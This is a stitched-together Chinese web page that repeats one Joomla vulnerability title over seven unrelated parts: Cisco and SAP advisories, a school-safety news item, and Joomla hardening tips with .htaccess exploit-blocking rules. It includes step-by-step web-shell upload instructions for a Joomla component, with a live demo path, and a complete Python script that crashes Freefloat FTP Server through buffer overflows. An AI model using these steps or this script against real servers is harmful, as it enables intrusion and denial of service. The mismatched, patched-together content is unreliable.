Joomla!多个远程安全漏洞
Joomla!多个远程安全漏洞(精选7篇)
Joomla!多个远程安全漏洞 第1篇
作者:1337
1. 有些joomal需要先注册.
site/index.php?option=com_user&view=login
2. 到上传地址
/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. 点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.
4. 上传后的文件在/ images/ksadvertiser/U0 这个目录下.
site/images/ksadvertiser/U0/adm1n.php.gif
Demo: alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
修复:
已通知官方
Joomla!多个远程安全漏洞 第2篇
Cisco Unified CallManager 5.0(3a)
Cisco Unified CallManager 5.0(3)
Cisco Unified CallManager 5.0(2)
Cisco Unified CallManager 5.0(1)
不受影响系统:
CiscoUnified CallManager 5.0(4)
描述:
BUGTRAQ ID: 18952
Cisco Unified CallManager是Cisco IP电话解决方案中基于软件的呼叫处理组件,
CallManager CLI提供了到系统的备用管理接口,以便诊断和排除基于HTTPS的主管理接口上的故障。这个以root用户权限运行的CLI在解析命令时存在两个漏洞,
第一个漏洞可能允许认证的CUCM管理员以root用户执行任意操作系统程序,第二个漏洞允许将命令输出重新定向到命令行中所指定的文件或文件夹。
Cisco Unified CallManager支持同时存在SCCP和SIP电话,这就允许迁移到SIP而仍保护对现有设备的投资。CUCM在处理SIP请求中的超长主机名时存在缓冲区溢出漏洞,可能导致执行任意代码或拒绝服务。
链接:www.cisco.com/warp/public/707/cisco-sa-0712-cucm.shtml
建议:
厂商补丁:
Cisco
Cisco已经为此发布了一个安全公告(cisco-sa-20060712-cucm)以及相应补丁:
cisco-sa-20060712-cucm:Multiple Cisco Unified CallManager Vulnerabilities
链接:www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml
补丁下载:
Joomla!多个远程安全漏洞 第3篇
为了消除隐患, 防范不安全事件发生, 兰州将通过多个100%行动确保学生和学校安全。
记者从兰州市教育局了解到, 今年, 兰州市力争让全体师生接受安全教育率达100%;各县区教育局和市教育局直属学校要设立学校安全管理机构, 配备专兼职安全管理人员达100%;学校食堂和超市进货索票、索证率达100%;学校食堂从业人员卫生健康知识培训合格率达100%;校方责任险达100%;各县区寄宿制学校和市直学校电子监控与防盗报警等安全技防设施配备达100%。
为提高安全意识和强化对学校的安全管理, 近日兰州市还对各县区教育局局长、学校校长开展了专门的安全管理培训。要求各级各类学校制订应急预案, 做好安全防范工作, 开展安全疏散演练, 提高学生自救自护能力, 对校园及周边安全排查整治, 及时消除隐患, 建立安全教育长效机制。
Joomla!多个远程安全漏洞 第4篇
SAP Internet Graphics Server 6.40 Patchlevel <= 16不受影响系统:SAP Internet Graphics Server 7.00 Patchlevel 7
SAP Internet Graphics Server 6.40 Patchlevel 17描述:
BUGTRAQID: 21449,21448
Internet Graphics Server(IGS)是SAP R/3企业环境的一个组件,可提供图形服务,
IGS实现上存在多个安全漏洞,远程攻击者可能利用这些漏洞获取敏感信息或执行非授权的恶意操作。
远程攻击者可以通过向SAP IGS提交特制的HTTP请求删除系统中的任意文件,
此外,远程攻击者还可以利用SAP IGS中的一些功能关闭服务器、访问配置文件或执行某些其他非授权操作。
<*来源:Mariano Nuñez Di Croce (mnunez@cybsec.com)
链接:secunia.com/advisories/23262/
www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf
www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Arbitrary_File_Removal.pdf
*>
建议:
厂商补丁:
SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Joomla!多个远程安全漏洞 第5篇
更新日期:2011-08-05
受影响系统:
Freefloat Freefloat FTP Server 1.00
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49052
Freefloat FTP Server是免费的用于上传文件和管理有线及无线设备的软件,
Freefloat FTP Server在多个命令的处理上存在远程缓冲区溢出漏洞,远程攻击者可利用这些漏洞在受影响应用程序中执行任意代码,也可能会造成拒绝服务。
<*来源:Veerendra G.G
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
49052.py
#!/usr/bin/python
##############################################################################
# Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor : www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory : secpod.org/blog/?p=310
# secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
# secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version : Freefloat FTP Server Version 1.0
# Date : 21/07/2011
##############################################################################
import sys, socket
def exploit(HOST, PORT, CMD):
try:
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_sock.connect((HOST, PORT))
except Exception, msg:
print “[-] Not able to connect to : ” , HOST
sys.exit(0)
res = tcp_sock.recv(1024)
if “220 FreeFloat” not in res:
print “[-] FreeFloat FTP Server Not Found...”
tcp_sock.close()
sys.exit(0)
tcp_sock.send(“USER testrn”)
tcp_sock.recv(1024)
tcp_sock.send(“PASS testrn”)
tcp_sock.recv(1024)
tcp_sock.send(CMD + “ ”+ “A” * 1000 + “rn”)
tcp_sock.close()
if __name__ == “__main__”:
if len(sys.argv) < 2:
print “t[-] Usage: python exploit.py target_ip”
print “t[-] Example : python exploit.py 127.0.0.1”
print “t[-] Exiting...”
sys.exit(0)
HOST = sys.argv[1]
PORT = 21
## Vulnerable Commands
CMDs = [“DELE”, “MDTM”, “RETR”, “RMD”, “RNFR”,
“RNTO”, “STOU”, “STOR”, “SIZE”, “APPE”, “STAT”]
for CMD in CMDs:
print “[+] Connecting with server...”
exploit(HOST, PORT, CMD)
print “[+] Exploit Sent with %s command...” %(CMD)
print “[+] Checking Server Crashed or not...”
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.close()
except Exception, msg:
print “[+] Server Crashed with %s Command” %(CMD)
sys.exit(0)
建议:
--------------------------------------------------------------------------------
厂商补丁:
Freefloat
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
Joomla!多个远程安全漏洞 第6篇
JomSocial JomSocial < 1.8.9漏洞描述:
Joomla!是一款开放源码的内容管理系统(CMS),
Joomla! JomSocialy组件的实现上存在设计漏洞,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令,
软件没有正确限制文件的上传,攻击者可以通过上传PHP代码文件执行任意命令。此漏洞的利用需要系统打开直接视频上传功能并允许列目录。
<*参考
jeffchannell.com/Joomla/jomsocial-188-shell-upload-vulnerability.html
*>
厂商补丁:
JomSocial
---------
目前厂商已经在1.8.9及以后版本的软件中修复了这个安全问题,请到厂商的主页下载:
Joomla!多个远程安全漏洞 第7篇
修改默认的 jos_ 数据表前缀
以管理员身份登录到 Joomla! 后台;
进入“全局设置”(global configuration),找到“数据库”标签页,修改原来的数据表前缀 jos_ 为新的前缀(例如:fdasqw_),然后点击“保存”;
通过 phpMyAdmin 访问你的网站数据库;
点击“导出”(export)标签页,所有参数保持默认值,直接点击“执行”按钮.导出过程可能需要一点时间;
导出完成后,打开得到的 SQL 文件,选择全部代码并复制,然后粘贴到文本编辑器(例如:Notepad++);
从 phpMyAdmin 中选择你数据库中的全部数据表,删除它们;
在 Notepad++ 中,利用“查找替换”功能,将全部 jos_ 字串替换为刚才设置的新前缀(fdasqw_);
完成替换后,复制全部代码.进入 phpMyAdmin,点击 SQL 标签页,将这些代码粘贴到输入框,然后点击“执行”按钮.
去掉第三方扩展的名称及版本号
大多数安全漏洞只存在于特定扩展的特定版本中.因此,为了防止 根据扩展名称及版本号来迅速寻找“肉机”,就有必要去掉网站前台显示的第三方扩展的名称及版本号.
有些开发人员会在后台参数中留下“是否显示作者版权链接”的选项,对于这些扩展,我们选择“否”即可;大多数第三方扩展的作者都会在前台留下一个版权链接,里面含有该扩展的名称和版本号.去掉这些 hardcod 方式的版权链接的方法是:
假设有一个 com_extension 扩展,将 /components/com_extension 目录复制到 PC 上,用 Notepad++ 打开其中一个 php 文件,然后使用“在多个文件中搜索”功能(勾选“搜索子目录”),搜索前台所显示的那个字串,找到之后直接从源代码中删除即可.
使用 SEF 友好网址组件
SEF 友好网址不仅有利于网站的搜索引擎优化(SEO),也有利于提高安全防护作用.原因是:如果不启用 SEF,则 Joomla! 默认的页面 URL 中会含有第三方扩展的名称,如网址中 ption=com_contact 这部分,这里 com_contact 就是“联系人管理”组件的名称.
当然不是通过肉眼来寻找 URL 里面的扩展名称,他们会使用 Google 搜索技巧中的 inurl 方法来快速寻找.
推荐使用 Artio JoomSEF,或者 sh404SEF,或者其它某个 SEF 组件来对 Joomla! 默认的动态网址进行静态化重写,一方面隐藏了扩展名称,另一方面也增强了 SEO 效果.
使用最新版本的 Joomla! 核心及扩展
经常了解一下你正在使用的 Joomla! 核心和第三方扩展是否有了新版本.如果有新版,就尽快升级.一般来说,新版本总是能够修复旧版的安全漏洞或功能 bug.
给目录及文件设置正确的权限(CHMOD)
只有当某个脚本会写入到目录或文件时,才将该目录或文件的权限设置为 777 或 707.其它所有文件和目录的权限都应该设置如下:
PHP 文件:644
配置文件:666
其它目录:755
Joomla之门提示:这里所说的 CHMOD 权限系统是 Linux/*nix 服务器平台特有的功能,如果你使用的是 Windows平台服务器,就没有这个功能.强烈建议将 Joomla! 运行在 Linux 服务器上.
及时删除残留文件
有时候你可能安装了某个扩展之后不久又不喜欢它了,多数用户这时会进行“取消发布”操作,而不是“卸载”.如果是“取消发布”,则该扩展的文件仍然存放在你的网站空间,如果该扩展的 PHP 文件正好存在一个安全漏洞,就很可能被 利用.因此,当你不再需要某个第三方扩展时,立即将它彻底删除,而不要“取消发布”.
Joomla!之门提示:当你通过 Joomla!后台卸载某些组件后,其数据表或许并未删除.如果你确认不再需要该组件,建议通过 phpMyAdmin 将其数据表也彻底删除,以免某个设计不严谨的数据表遭到 SQL Injection 劫持.
修改 .htaccess 文件
用文本编辑器 Notepad++ 打开你 Joomla 网站根目录下的 .htaccess 文件,添加下面的代码进去:
以下为引用的内容:
########## Begin - Rewrite rules to block out some common exploits#
# Block out any script. trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script. trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script. that includes a < script. tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script. trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script. trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script. that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
# Block out any script. that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
Joomla!多个远程安全漏洞
声明:除非特别标注,否则均为本站原创文章,转载时请以链接形式注明文章出处。如若本站内容侵犯了原著者的合法权益,可联系本站删除。


